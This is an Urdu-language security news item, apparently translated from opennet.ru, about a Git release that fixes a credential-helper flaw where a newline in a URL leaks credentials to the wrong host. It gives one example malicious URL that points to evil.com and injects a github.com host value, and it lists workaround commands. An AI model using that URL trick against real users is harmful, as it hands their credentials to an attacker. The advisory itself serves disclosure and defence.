تقسیم شدہ سورس کنٹرول سسٹم Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 اور 2.17.4 کی اصلاحی ریلیز جس نے ختم کر دیا () ہینڈلر میں ""، جس کی وجہ سے اسناد غلط ہوسٹ کو بھیجی جاتی ہیں جب گٹ کلائنٹ ایک خاص فارمیٹ شدہ یو آر ایل کا استعمال کرتے ہوئے ریپوزٹری تک رسائی حاصل کرتا ہے جس میں ایک نئی لائن کریکٹر ہوتا ہے۔ خطرے کا استعمال کسی دوسرے میزبان کی طرف سے تصدیق نامے کو حملہ آور کے زیر کنٹرول سرور کو بھیجنے کے لیے استعمال کیا جا سکتا ہے۔
"https://evil.com?%0ahost=github.com/" جیسے یو آر ایل کی وضاحت کرتے وقت، ہوسٹ evil.com سے منسلک ہونے پر کریڈینشل ہینڈلر github.com کے لیے مخصوص تصدیقی پیرامیٹرز کو پاس کرے گا۔ مسئلہ اس وقت پیش آتا ہے جب "گٹ کلون" جیسے آپریشنز انجام دیتے ہیں، بشمول سب موڈیولز کے لیے یو آر ایل کی پروسیسنگ (مثال کے طور پر، "گٹ سب موڈیول اپ ڈیٹ" ریپوزٹری سے .gitmodules فائل میں بیان کردہ URLs پر خود بخود کارروائی کرے گا)۔ کمزوری ان حالات میں سب سے زیادہ خطرناک ہوتی ہے جہاں ایک ڈویلپر یو آر ایل کو دیکھے بغیر کسی ریپوزٹری کو کلون کرتا ہے، مثال کے طور پر، سب ماڈیولز کے ساتھ کام کرتے وقت، یا ایسے سسٹمز میں جو خودکار کارروائیاں کرتے ہیں، مثال کے طور پر، پیکیج کی تعمیر کے اسکرپٹس میں۔
نئے ورژن میں کمزوریوں کو روکنے کے لیے کریڈینشل ایکسچینج پروٹوکول کے ذریعے منتقل ہونے والی کسی بھی اقدار میں ایک نئی لائن کریکٹر کو منتقل کرنا۔ ڈسٹری بیوشنز کے لیے، آپ پیجز پر پیکیج اپ ڈیٹس کی ریلیز کو ٹریک کر سکتے ہیں۔ , , , , , , .
مسئلہ کو روکنے کے لئے ایک حل کے طور پر عوامی ذخیروں تک رسائی حاصل کرتے وقت credential.helper کا استعمال نہ کریں اور "--recurse-submodules" موڈ میں غیر چیک شدہ ریپوزٹریز کے ساتھ "git clone" استعمال نہ کریں۔ credential.helper ہینڈلر کو مکمل طور پر غیر فعال کرنے کے لیے، جو کرتا ہے۔ اور سے پاس ورڈز کی بازیافت ، محفوظ یا پاس ورڈ والی فائل، آپ کمانڈز استعمال کر سکتے ہیں:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
ماخذ: opennet.ru